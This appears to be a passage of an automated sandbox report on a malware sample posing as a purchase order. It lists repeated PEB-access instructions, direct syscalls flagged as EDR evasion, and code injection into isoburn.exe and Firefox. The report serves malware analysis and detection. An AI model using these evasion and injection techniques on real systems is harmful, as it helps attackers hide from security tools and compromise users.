                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A9D0 mov eax, dword ptr fs:[00000030h]3_2_0186A9D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A9D0 mov eax, dword ptr fs:[00000030h]3_2_0186A9D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A9D0 mov eax, dword ptr fs:[00000030h]3_2_0186A9D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A9D0 mov eax, dword ptr fs:[00000030h]3_2_0186A9D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A9D0 mov eax, dword ptr fs:[00000030h]3_2_0186A9D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A9D0 mov eax, dword ptr fs:[00000030h]3_2_0186A9D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018949D0 mov eax, dword ptr fs:[00000030h]3_2_018949D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EE9E0 mov eax, dword ptr fs:[00000030h]3_2_018EE9E0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018929F9 mov eax, dword ptr fs:[00000030h]3_2_018929F9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018929F9 mov eax, dword ptr fs:[00000030h]3_2_018929F9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DE908 mov eax, dword ptr fs:[00000030h]3_2_018DE908
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DE908 mov eax, dword ptr fs:[00000030h]3_2_018DE908
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EC912 mov eax, dword ptr fs:[00000030h]3_2_018EC912
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01858918 mov eax, dword ptr fs:[00000030h]3_2_01858918
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01858918 mov eax, dword ptr fs:[00000030h]3_2_01858918
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E892A mov eax, dword ptr fs:[00000030h]3_2_018E892A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F892B mov eax, dword ptr fs:[00000030h]3_2_018F892B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E0946 mov eax, dword ptr fs:[00000030h]3_2_018E0946
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A096E mov eax, dword ptr fs:[00000030h]3_2_018A096E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A096E mov edx, dword ptr fs:[00000030h]3_2_018A096E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A096E mov eax, dword ptr fs:[00000030h]3_2_018A096E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01904978 mov eax, dword ptr fs:[00000030h]3_2_01904978
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01904978 mov eax, dword ptr fs:[00000030h]3_2_01904978
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01886962 mov eax, dword ptr fs:[00000030h]3_2_01886962
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01886962 mov eax, dword ptr fs:[00000030h]3_2_01886962
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01886962 mov eax, dword ptr fs:[00000030h]3_2_01886962
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EC97C mov eax, dword ptr fs:[00000030h]3_2_018EC97C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01860887 mov eax, dword ptr fs:[00000030h]3_2_01860887
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EC89D mov eax, dword ptr fs:[00000030h]3_2_018EC89D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188E8C0 mov eax, dword ptr fs:[00000030h]3_2_0188E8C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019308C0 mov eax, dword ptr fs:[00000030h]3_2_019308C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189C8F9 mov eax, dword ptr fs:[00000030h]3_2_0189C8F9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189C8F9 mov eax, dword ptr fs:[00000030h]3_2_0189C8F9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192A8E4 mov eax, dword ptr fs:[00000030h]3_2_0192A8E4
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EC810 mov eax, dword ptr fs:[00000030h]3_2_018EC810
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190483A mov eax, dword ptr fs:[00000030h]3_2_0190483A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190483A mov eax, dword ptr fs:[00000030h]3_2_0190483A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189A830 mov eax, dword ptr fs:[00000030h]3_2_0189A830
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01882835 mov eax, dword ptr fs:[00000030h]3_2_01882835
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01882835 mov eax, dword ptr fs:[00000030h]3_2_01882835
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01882835 mov eax, dword ptr fs:[00000030h]3_2_01882835
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01882835 mov ecx, dword ptr fs:[00000030h]3_2_01882835
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01882835 mov eax, dword ptr fs:[00000030h]3_2_01882835
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01882835 mov eax, dword ptr fs:[00000030h]3_2_01882835
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01872840 mov ecx, dword ptr fs:[00000030h]3_2_01872840
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01890854 mov eax, dword ptr fs:[00000030h]3_2_01890854
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01864859 mov eax, dword ptr fs:[00000030h]3_2_01864859
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01864859 mov eax, dword ptr fs:[00000030h]3_2_01864859
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EE872 mov eax, dword ptr fs:[00000030h]3_2_018EE872
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018EE872 mov eax, dword ptr fs:[00000030h]3_2_018EE872
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F6870 mov eax, dword ptr fs:[00000030h]3_2_018F6870
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F6870 mov eax, dword ptr fs:[00000030h]3_2_018F6870
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01914BB0 mov eax, dword ptr fs:[00000030h]3_2_01914BB0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01914BB0 mov eax, dword ptr fs:[00000030h]3_2_01914BB0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870BBE mov eax, dword ptr fs:[00000030h]3_2_01870BBE
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870BBE mov eax, dword ptr fs:[00000030h]3_2_01870BBE
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190EBD0 mov eax, dword ptr fs:[00000030h]3_2_0190EBD0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01880BCB mov eax, dword ptr fs:[00000030h]3_2_01880BCB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01880BCB mov eax, dword ptr fs:[00000030h]3_2_01880BCB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01880BCB mov eax, dword ptr fs:[00000030h]3_2_01880BCB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01860BCD mov eax, dword ptr fs:[00000030h]3_2_01860BCD
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01860BCD mov eax, dword ptr fs:[00000030h]3_2_01860BCD
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01860BCD mov eax, dword ptr fs:[00000030h]3_2_01860BCD
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188EBFC mov eax, dword ptr fs:[00000030h]3_2_0188EBFC
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01868BF0 mov eax, dword ptr fs:[00000030h]3_2_01868BF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01868BF0 mov eax, dword ptr fs:[00000030h]3_2_01868BF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01868BF0 mov eax, dword ptr fs:[00000030h]3_2_01868BF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018ECBF0 mov eax, dword ptr fs:[00000030h]3_2_018ECBF0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DEB1D mov eax, dword ptr fs:[00000030h]3_2_018DEB1D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DEB1D mov eax, dword ptr fs:[00000030h]3_2_018DEB1D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DEB1D mov eax, dword ptr fs:[00000030h]3_2_018DEB1D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DEB1D mov eax, dword ptr fs:[00000030h]3_2_018DEB1D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DEB1D mov eax, dword ptr fs:[00000030h]3_2_018DEB1D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DEB1D mov eax, dword ptr fs:[00000030h]3_2_018DEB1D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DEB1D mov eax, dword ptr fs:[00000030h]3_2_018DEB1D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DEB1D mov eax, dword ptr fs:[00000030h]3_2_018DEB1D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DEB1D mov eax, dword ptr fs:[00000030h]3_2_018DEB1D
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188EB20 mov eax, dword ptr fs:[00000030h]3_2_0188EB20
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188EB20 mov eax, dword ptr fs:[00000030h]3_2_0188EB20
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01928B28 mov eax, dword ptr fs:[00000030h]3_2_01928B28
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01928B28 mov eax, dword ptr fs:[00000030h]3_2_01928B28
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190EB50 mov eax, dword ptr fs:[00000030h]3_2_0190EB50
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F6B40 mov eax, dword ptr fs:[00000030h]3_2_018F6B40
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F6B40 mov eax, dword ptr fs:[00000030h]3_2_018F6B40
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192AB40 mov eax, dword ptr fs:[00000030h]3_2_0192AB40
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01908B42 mov eax, dword ptr fs:[00000030h]3_2_01908B42
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01914B4B mov eax, dword ptr fs:[00000030h]3_2_01914B4B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01914B4B mov eax, dword ptr fs:[00000030h]3_2_01914B4B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185CB7E mov eax, dword ptr fs:[00000030h]3_2_0185CB7E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186EA80 mov eax, dword ptr fs:[00000030h]3_2_0186EA80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186EA80 mov eax, dword ptr fs:[00000030h]3_2_0186EA80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186EA80 mov eax, dword ptr fs:[00000030h]3_2_0186EA80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186EA80 mov eax, dword ptr fs:[00000030h]3_2_0186EA80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186EA80 mov eax, dword ptr fs:[00000030h]3_2_0186EA80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186EA80 mov eax, dword ptr fs:[00000030h]3_2_0186EA80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186EA80 mov eax, dword ptr fs:[00000030h]3_2_0186EA80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186EA80 mov eax, dword ptr fs:[00000030h]3_2_0186EA80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186EA80 mov eax, dword ptr fs:[00000030h]3_2_0186EA80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01934A80 mov eax, dword ptr fs:[00000030h]3_2_01934A80
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01898A90 mov edx, dword ptr fs:[00000030h]3_2_01898A90
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01868AA0 mov eax, dword ptr fs:[00000030h]3_2_01868AA0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01868AA0 mov eax, dword ptr fs:[00000030h]3_2_01868AA0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018B6AA4 mov eax, dword ptr fs:[00000030h]3_2_018B6AA4
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018B6ACC mov eax, dword ptr fs:[00000030h]3_2_018B6ACC
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018B6ACC mov eax, dword ptr fs:[00000030h]3_2_018B6ACC
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018B6ACC mov eax, dword ptr fs:[00000030h]3_2_018B6ACC
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01860AD0 mov eax, dword ptr fs:[00000030h]3_2_01860AD0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01894AD0 mov eax, dword ptr fs:[00000030h]3_2_01894AD0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01894AD0 mov eax, dword ptr fs:[00000030h]3_2_01894AD0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189AAEE mov eax, dword ptr fs:[00000030h]3_2_0189AAEE
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189AAEE mov eax, dword ptr fs:[00000030h]3_2_0189AAEE
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018ECA11 mov eax, dword ptr fs:[00000030h]3_2_018ECA11
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188EA2E mov eax, dword ptr fs:[00000030h]3_2_0188EA2E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189CA24 mov eax, dword ptr fs:[00000030h]3_2_0189CA24
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189CA38 mov eax, dword ptr fs:[00000030h]3_2_0189CA38
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01884A35 mov eax, dword ptr fs:[00000030h]3_2_01884A35
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01884A35 mov eax, dword ptr fs:[00000030h]3_2_01884A35
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01866A50 mov eax, dword ptr fs:[00000030h]3_2_01866A50
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01866A50 mov eax, dword ptr fs:[00000030h]3_2_01866A50
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01866A50 mov eax, dword ptr fs:[00000030h]3_2_01866A50
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01866A50 mov eax, dword ptr fs:[00000030h]3_2_01866A50
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01866A50 mov eax, dword ptr fs:[00000030h]3_2_01866A50
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01866A50 mov eax, dword ptr fs:[00000030h]3_2_01866A50
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01866A50 mov eax, dword ptr fs:[00000030h]3_2_01866A50
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870A5B mov eax, dword ptr fs:[00000030h]3_2_01870A5B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01870A5B mov eax, dword ptr fs:[00000030h]3_2_01870A5B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189CA6F mov eax, dword ptr fs:[00000030h]3_2_0189CA6F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189CA6F mov eax, dword ptr fs:[00000030h]3_2_0189CA6F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189CA6F mov eax, dword ptr fs:[00000030h]3_2_0189CA6F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190EA60 mov eax, dword ptr fs:[00000030h]3_2_0190EA60
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DCA72 mov eax, dword ptr fs:[00000030h]3_2_018DCA72
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DCA72 mov eax, dword ptr fs:[00000030h]3_2_018DCA72
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01896DA0 mov eax, dword ptr fs:[00000030h]3_2_01896DA0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01888DBF mov eax, dword ptr fs:[00000030h]3_2_01888DBF
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01888DBF mov eax, dword ptr fs:[00000030h]3_2_01888DBF
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189CDB1 mov ecx, dword ptr fs:[00000030h]3_2_0189CDB1
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189CDB1 mov eax, dword ptr fs:[00000030h]3_2_0189CDB1
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189CDB1 mov eax, dword ptr fs:[00000030h]3_2_0189CDB1
                Source: C:\Users\user\Desktop\Purchase Order..exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: NULL target: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeSection loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\isoburn.exeThread register set: target process: 4936Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess created: C:\Users\user\Desktop\Purchase Order..exe "C:\Users\user\Desktop\Purchase Order..exe"Jump to behavior
                Source: C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: jfBrBcvTIMPfDU.exe, 00000005.00000002.2661131947.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000005.00000000.1754096305.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2661177978.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
